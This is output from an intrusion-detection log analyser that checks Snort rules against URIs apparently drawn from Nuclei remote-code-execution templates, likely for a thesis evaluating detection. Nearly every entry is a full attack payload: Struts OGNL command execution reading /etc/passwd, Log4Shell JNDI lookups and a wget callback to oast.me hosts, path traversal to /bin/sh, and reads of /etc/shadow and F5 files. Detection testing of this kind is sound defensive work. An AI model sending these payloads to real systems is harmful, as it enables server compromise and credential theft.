# inspectorlog v3.5
#----- Initializing Rules (SNORT) ---------------------
# Rules directory : "/home/kali/Downloads/reglas_javi/snort"
#	Opening SNORT rule file /home/kali/Downloads/reglas_javi/snort/http_uri-sn-20220324.rules... done
#		Rules: read [3749], erroneous [0], URI [384]
#	Opening SNORT rule file /home/kali/Downloads/reglas_javi/snort/http_uri-er-20220224.rules... done
[parse_snortRule] WARNING: Line [4970] exceeds allowed number of PCRE fields
#		Rules: read [6015], erroneous [0], URI [5116]
#----- Statistics (SNORT) ------------------------------
# Read [9764] Snort rules, [5500] http-related, [0] with errors
#----- Analysis results ----------------------------
# Alerts & signatures generated from: /home/kali/Downloads/inspectorlog/inspectorlog -l rce.uri -r /home/kali/Downloads/reglas_javi/snort -t list -o /home/kali/TFG/inspectorlog/snort/web_estatica/owasp/opensource/nuclei/rce.clean
Packet [15]	Uri [/web/web.config.i18n.ashx?l=nuclei&v=nuclei]	Nattacks [1]	Signatures	[56916]
Packet [22]	Uri [/web/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh]	Nattacks [1]	Signatures	[2011465]
Packet [46]	Uri [/web/console/images/%252e%252e%252fconsole.portal]	Nattacks [1]	Signatures	[2019880]
Packet [48]	Uri [/web/web.config.i18n.ashx?l=nuclei&v=nuclei]	Nattacks [1]	Signatures	[56916]
Packet [64]	Uri [/web/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(name=%27test%27,%20root=%27http://aaa%27)%0a@Grab(group=%27package%27,%20module=%27vulntest%27,%20version=%271%27)%0aimport%20Payload;]	Nattacks [1]	Signatures	[49499]
Packet [65]	Uri [/web/cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;/root/kerbynet.cgi/scripts/getkey%20../../../etc/passwd;%22]	Nattacks [2]	Signatures	[54794]	[2030597]
Packet [76]	Uri [/web/guest_auth/poc.php?cmd=cat%20/etc/passwd]	Nattacks [1]	Signatures	[2010920]
Packet [78]	Uri [/web/.%0d./.%0d./.%0d./.%0d./bin/sh]	Nattacks [1]	Signatures	[2011465]
Packet [91]	Uri [/web/console/images/%252e%252e%252fconsole.portal]	Nattacks [1]	Signatures	[2019880]
Packet [97]	Uri [/web/hystrix/;a=a/__$%7BT%20%28java.lang.Runtime%29.getRuntime%28%29.exec%28%22nslookup%20c8ach799m8v918fkv9igcekcteeyyyyya.oast.me%22%29%7D__::.x/]	Nattacks [2]	Signatures	[2008176]	[2026033]
Packet [109]	Uri [/web/cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;/root/kerbynet.cgi/scripts/getkey%20../../../etc/passwd;%22]	Nattacks [2]	Signatures	[54794]	[2030597]
Packet [110]	Uri [/web/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(name=%27test%27,%20root=%27http://aaa%27)%0a@Grab(group=%27package%27,%20module=%27vulntest%27,%20version=%271%27)%0aimport%20Payload;]	Nattacks [1]	Signatures	[49499]
Packet [131]	Uri [/web/?id=%25%7B%28%23instancemanager%3D%23application%5B%22org.apache.tomcat.InstanceManager%22%5D%29.%28%23stack%3D%23attr%5B%22com.opensymphony.xwork2.util.ValueStack.ValueStack%22%5D%29.%28%23bean%3D%23instancemanager.newInstance%28%22org.apache.commons.collections.BeanMap%22%29%29.%28%23bean.setBean%28%23stack%29%29.%28%23context%3D%23bean.get%28%22context%22%29%29.%28%23bean.setBean%28%23context%29%29.%28%23macc%3D%23bean.get%28%22memberAccess%22%29%29.%28%23bean.setBean%28%23macc%29%29.%28%23emptyset%3D%23instancemanager.newInstance%28%22java.util.HashSet%22%29%29.%28%23bean.put%28%22excludedClasses%22%2C%23emptyset%29%29.%28%23bean.put%28%22excludedPackageNames%22%2C%23emptyset%29%29.%28%23arglist%3D%23instancemanager.newInstance%28%22java.util.ArrayList%22%29%29.%28%23arglist.add%28%22cat+%2Fetc%2Fpasswd%22%29%29.%28%23execute%3D%23instancemanager.newInstance%28%22freemarker.template.utility.Execute%22%29%29.%28%23execute.exec%28%23arglist%29%29%7D]	Nattacks [1]	Signatures	[2008176]
Packet [133]	Uri [/web/premise/front/getPingData?url=http://0.0.0.0:9600/sm/api/v1/firewall/zone/services?zone=;/usr/bin/id;]	Nattacks [1]	Signatures	[2032095]
Packet [144]	Uri [/web/invoker/JMXInvokerServlet/]	Nattacks [2]	Signatures	[24343]	[2015747]
Packet [169]	Uri [/web/index.action?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding%5B0%5D),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd%5B0%5D).getInputStream()).useDelimiter(%23parameters.pp%5B0%5D),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp%5B0%5D,%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&pp=%5C%5CA&ppp=%20&encoding=UTF-8&cmd=cat%20/etc/passwd]	Nattacks [7]	Signatures	[21656]	[39190]	[47634]	[47649]	[2008176]	[2016953]	[2026094]
Packet [180]	Uri [/web/premise/front/getPingData?url=http://0.0.0.0:9600/sm/api/v1/firewall/zone/services?zone=;/usr/bin/id;]	Nattacks [1]	Signatures	[2032095]
Packet [181]	Uri [/web/poc.jsp/]	Nattacks [3]	Signatures	[44531]	[2024808]	[2024811]
Packet [188]	Uri [/web/oauth/authorize?response_type=${13337*73331}&client_id=acme&scope=openid&redirect_uri=http://test]	Nattacks [1]	Signatures	[46823]
Packet [190]	Uri [/web/esp/cms_changeDeviceContext.esp?device=aaaaa:a%27";user|s."1337";]	Nattacks [1]	Signatures	[45236]
Packet [223]	Uri [/web/upgrade_handle.php?cmd=writeuploaddir&uploaddir=%27;whoami;%27]	Nattacks [3]	Signatures	[44472]	[50646]	[2024914]
Packet [226]	Uri [/web/console/images/%252e%252e%252fconsole.portal]	Nattacks [1]	Signatures	[2019880]
Packet [235]	Uri [/web/poc.jsp/]	Nattacks [3]	Signatures	[44531]	[2024808]	[2024811]
Packet [237]	Uri [/web/oauth/authorize?response_type=${13337*73331}&client_id=acme&scope=openid&redirect_uri=http://test]	Nattacks [1]	Signatures	[46823]
Packet [244]	Uri [/web/reports/rwservlet?report=test.rdf&desformat=html&destype=cache&JOBTYPE=rwurl&URLPARAMETER=file:///]	Nattacks [1]	Signatures	[2018092]
Packet [248]	Uri [/web/esp/cms_changeDeviceContext.esp?device=aaaaa:a%27";user|s."1337";]	Nattacks [1]	Signatures	[45236]
Packet [264]	Uri [/web/index.php?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input]	Nattacks [4]	Signatures	[2013001]	[2014704]	[2016977]	[2016982]
Packet [265]	Uri [/web/devmode.action?debug=command&expression=(%23_memberAccess[%22allowStaticMethodAccess%22]%3Dtrue%2C%23foo%3Dnew%20java.lang.Boolean(%22false%22)%20%2C%23context[%22xwork.MethodAccessor.denyMethodExecution%22]%3D%23foo%2C@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%27cat%20/etc/passwd%27).getInputStream()))]	Nattacks [12]	Signatures	[21072]	[21073]	[21075]	[21656]	[39190]	[39191]	[47634]	[2008176]	[2016920]	[2016953]	[2016956]	[2026035]
Packet [266]	Uri [/web/upgrade_handle.php?cmd=writeuploaddir&uploaddir=%27;whoami;%27]	Nattacks [3]	Signatures	[44472]	[50646]	[2024914]
Packet [272]	Uri [/web/console/images/%252e%252e%252fconsole.portal]	Nattacks [1]	Signatures	[2019880]
Packet [293]	Uri [/web/nuxeo/login.jsp/pwn$%7B31333333330+7%7D.xhtml]	Nattacks [3]	Signatures	[44531]	[2024808]	[2024811]
Packet [301]	Uri [/web/solr/admin/collections?action=$%7Bjndi:ldap://$%7BhostName%7D.c8ach799m8v918fkv9igcekctjeyyyynw.oast.me/a%7D]	Nattacks [2]	Signatures	[58722]	[58744]
Packet [315]	Uri [/web/cgi-bin/kerbynet?Action=x509view&Section=NoAuthREQ&User=&x509type=%27%0A%2Fetc%2Fsudo+tar+-cf+%2Fdev%2Fnull+%2Fdev%2Fnull+--checkpoint%3d1+--checkpoint-action%3dexec%3d%22id%22%0A%27]	Nattacks [1]	Signatures	[2030597]
Packet [322]	Uri [/web/nuxeo/login.jsp/pwn$%7B31333333330+7%7D.xhtml]	Nattacks [3]	Signatures	[44531]	[2024808]	[2024811]
Packet [330]	Uri [/web/?Express=aaaa&autoEscape=&defaultFilter=e%27);var+require=global.require+%7C%7C+global.process.mainModule.constructor._load;+require(%27child_process%27).exec(%27wget%20http://c8ach799m8v918fkv9igcekctjoyyyynh.oast.me%27);//]	Nattacks [1]	Signatures	[2008176]
Packet [344]	Uri [/web/%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27cat%20/etc/passwd%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D/actionChain1.action]	Nattacks [12]	Signatures	[39190]	[39191]	[47634]	[2008176]	[2016953]	[2016956]	[2017277]	[2026026]	[2026032]	[2026033]	[2026035]	[2026094]
Packet [352]	Uri [/web/?x=${jndi:ldap://127.0.0.1]	Nattacks [2]	Signatures	[58722]	[58744]
Packet [356]	Uri [/web/?x=${jndi:ldap://${hostName}.c8ach799m8v918fkv9igcekctjayyyyr1.oast.me/a}]	Nattacks [2]	Signatures	[58722]	[58744]
Packet [357]	Uri [/web/?name=%25%7B%28%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS%29.%28%23_memberAccess%3F%28%23_memberAccess%3D%23dm%29%3A%28%28%23container%3D%23context%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ognlUtil%3D%23container.getInstance%28%40com.opensymphony.xwork2.ognl.OgnlUtil%40class%29%29.%28%23ognlUtil.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ognlUtil.getExcludedClasses%28%29.clear%28%29%29.%28%23context.setMemberAccess%28%23dm%29%29%29%29.%28%23cmd%3D%27cat%20/etc/passwd%27%29.%28%23iswin%3D%28%40java.lang.System%40getProperty%28%27os.name%27%29.toLowerCase%28%29.contains%28%27win%27%29%29%29.%28%23cmds%3D%28%23iswin%3F%7B%27cmd.exe%27%2C%27/c%27%2C%23cmd%7D%3A%7B%27/bin/bash%27%2C%27-c%27%2C%23cmd%7D%29%29.%28%23p%3Dnew%20java.lang.ProcessBuilder%28%23cmds%29%29.%28%23p.redirectErrorStream%28true%29%29.%28%23process%3D%23p.start%28%29%29.%28%40org.apache.commons.io.IOUtils%40toString%28%23process.getInputStream%28%29%29%29%7D]	Nattacks [7]	Signatures	[39190]	[39191]	[47649]	[2010667]	[2017172]	[2026035]	[2026095]
Packet [363]	Uri [/web/fw.login.php?apikey=%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27;]	Nattacks [1]	Signatures	[2006446]
Packet [394]	Uri [/web/%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27cat%20/etc/passwd%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D/actionChain1.action]	Nattacks [12]	Signatures	[39190]	[39191]	[47634]	[2008176]	[2016953]	[2016956]	[2017277]	[2026026]	[2026032]	[2026033]	[2026035]	[2026094]
Packet [409]	Uri [/web/?x=${jndi:ldap://${hostName}.c8ach799m8v918fkv9igcekctjayyyyr1.oast.me/a}]	Nattacks [2]	Signatures	[58722]	[58744]
Packet [412]	Uri [/web/?name=%25%7B%28%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS%29.%28%23_memberAccess%3F%28%23_memberAccess%3D%23dm%29%3A%28%28%23container%3D%23context%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ognlUtil%3D%23container.getInstance%28%40com.opensymphony.xwork2.ognl.OgnlUtil%40class%29%29.%28%23ognlUtil.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ognlUtil.getExcludedClasses%28%29.clear%28%29%29.%28%23context.setMemberAccess%28%23dm%29%29%29%29.%28%23cmd%3D%27cat%20/etc/passwd%27%29.%28%23iswin%3D%28%40java.lang.System%40getProperty%28%27os.name%27%29.toLowerCase%28%29.contains%28%27win%27%29%29%29.%28%23cmds%3D%28%23iswin%3F%7B%27cmd.exe%27%2C%27/c%27%2C%23cmd%7D%3A%7B%27/bin/bash%27%2C%27-c%27%2C%23cmd%7D%29%29.%28%23p%3Dnew%20java.lang.ProcessBuilder%28%23cmds%29%29.%28%23p.redirectErrorStream%28true%29%29.%28%23process%3D%23p.start%28%29%29.%28%40org.apache.commons.io.IOUtils%40toString%28%23process.getInputStream%28%29%29%29%7D]	Nattacks [7]	Signatures	[39190]	[39191]	[47649]	[2010667]	[2017172]	[2026035]	[2026095]
Packet [426]	Uri [/web/cgi-bin/.%2e/%2e%2e/%2e%2e/bin/sh]	Nattacks [1]	Signatures	[2011465]
Packet [430]	Uri [/web/autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com]	Nattacks [1]	Signatures	[57907]
Packet [442]	Uri [/web/Schemas/$%7B%27%27.class.forName%28%27javax.script.ScriptEngineManager%27%29.newInstance%28%29.getEngineByName%28%27js%27%29.eval%28%27java.lang.Runtime.getRuntime%28%29.exec%28%22id%22%29%27%29%7D]	Nattacks [2]	Signatures	[2008176]	[2026033]
Packet [459]	Uri [/web/index.action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}]	Nattacks [7]	Signatures	[21072]	[27244]	[47690]	[2017172]	[2026032]	[2026033]	[2026096]
Packet [463]	Uri [/web/cgi-bin/;cat$IFS/etc/passwd]	Nattacks [2]	Signatures	[2009678]	[2023628]
Packet [469]	Uri [/web/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd]	Nattacks [2]	Signatures	[44531]	[54462]
Packet [471]	Uri [/web/crowd/plugins/servlet/exp?cmd=cat%20/etc/shadow]	Nattacks [1]	Signatures	[2009485]
Packet [474]	Uri [/web/autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com]	Nattacks [1]	Signatures	[57907]
Packet [479]	Uri [/web/autodiscover/autodiscover.json?@test.com/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@test.com]	Nattacks [1]	Signatures	[57907]
Packet [485]	Uri [/web/webadmin/script?command=|%20nslookup%20c8ach799m8v918fkv9igcekctkoyyyyg4.oast.me]	Nattacks [1]	Signatures	[2027453]
Packet [490]	Uri [/web/Schemas/$%7B%27%27.class.forName%28%27javax.script.ScriptEngineManager%27%29.newInstance%28%29.getEngineByName%28%27js%27%29.eval%28%27java.lang.Runtime.getRuntime%28%29.exec%28%22id%22%29%27%29%7D]	Nattacks [2]	Signatures	[2008176]	[2026033]
Packet [507]	Uri [/web/index.action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}]	Nattacks [7]	Signatures	[21072]	[27244]	[47690]	[2017172]	[2026032]	[2026033]	[2026096]
Packet [508]	Uri [/web/index.action?action:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}]	Nattacks [7]	Signatures	[21072]	[27245]	[47690]	[2017172]	[2026032]	[2026033]	[2026096]
Packet [509]	Uri [/web/index.action?redirectAction:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}]	Nattacks [7]	Signatures	[21072]	[27243]	[47690]	[2017172]	[2026032]	[2026033]	[2026096]
Packet [514]	Uri [/web/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd]	Nattacks [2]	Signatures	[44531]	[54462]
Packet [515]	Uri [/web/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/f5-release]	Nattacks [2]	Signatures	[44531]	[54462]
Packet [516]	Uri [/web/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license]	Nattacks [2]	Signatures	[44531]	[54462]
Packet [517]	Uri [/web/crowd/plugins/servlet/exp?cmd=cat%20/etc/shadow]	Nattacks [1]	Signatures	[2009485]
Packet [520]	Uri [/web/autodiscover/autodiscover.json?@test.com/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@test.com]	Nattacks [1]	Signatures	[57907]
Packet [533]	Uri [/web/index.action?redirectAction:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}]	Nattacks [7]	Signatures	[21072]	[27243]	[47690]	[2017172]	[2026032]	[2026033]	[2026096]
Packet [534]	Uri [/web/login.action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}]	Nattacks [7]	Signatures	[21072]	[27244]	[47690]	[2017172]	[2026032]	[2026033]	[2026096]
Packet [535]	Uri [/web/login.action?action:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}]	Nattacks [7]	Signatures	[21072]	[27245]	[47690]	[2017172]	[2026032]	[2026033]	[2026096]
Packet [537]	Uri [/web/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license]	Nattacks [2]	Signatures	[44531]	[54462]
Packet [538]	Uri [/web/hsqldb%0a]	Nattacks [1]	Signatures	[54484]
Packet [545]	Uri [/web/login.action?action:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}]	Nattacks [7]	Signatures	[21072]	[27245]	[47690]	[2017172]	[2026032]	[2026033]	[2026096]
Packet [546]	Uri [/web/login.action?redirectAction:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}]	Nattacks [7]	Signatures	[21072]	[27243]	[47690]	[2017172]	[2026032]	[2026033]	[2026096]
Packet [547]	Uri [/web/hsqldb%0a]	Nattacks [1]	Signatures	[54484]
Packet [555]	Uri [/web/login.action?redirectAction:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}]	Nattacks [7]	Signatures	[21072]	[27243]	[47690]	[2017172]	[2026032]	[2026033]	[2026096]
Packet [556]	Uri [/web/index.action?redirect%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D]	Nattacks [19]	Signatures	[21072]	[21073]	[21656]	[27244]	[39190]	[39191]	[47634]	[2008176]	[2016920]	[2016953]	[2016956]	[2026024]	[2026032]	[2026033]	[2026034]	[2026035]	[2026094]	[2026095]	[2026096]
Packet [557]	Uri [/web/index.action?action%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D]	Nattacks [18]	Signatures	[21072]	[21073]	[21656]	[39190]	[39191]	[47634]	[2008176]	[2016920]	[2016953]	[2016956]	[2026024]	[2026032]	[2026033]	[2026034]	[2026035]	[2026094]	[2026095]	[2026096]
Packet [562]	Uri [/web/index.action?action%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D]	Nattacks [18]	Signatures	[21072]	[21073]	[21656]	[39190]	[39191]	[47634]	[2008176]	[2016920]	[2016953]	[2016956]	[2026024]	[2026032]	[2026033]	[2026034]	[2026035]	[2026094]	[2026095]	[2026096]
Packet [563]	Uri [/web/index.action?redirectAction%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D]	Nattacks [19]	Signatures	[21072]	[21073]	[21656]	[27243]	[39190]	[39191]	[47634]	[2008176]	[2016920]	[2016953]	[2016956]	[2026024]	[2026032]	[2026033]	[2026034]	[2026035]	[2026094]	[2026095]	[2026096]
# N. packets [565], [75] with alerts, N. Alerts [287]
# Execution time: 0.043428 s
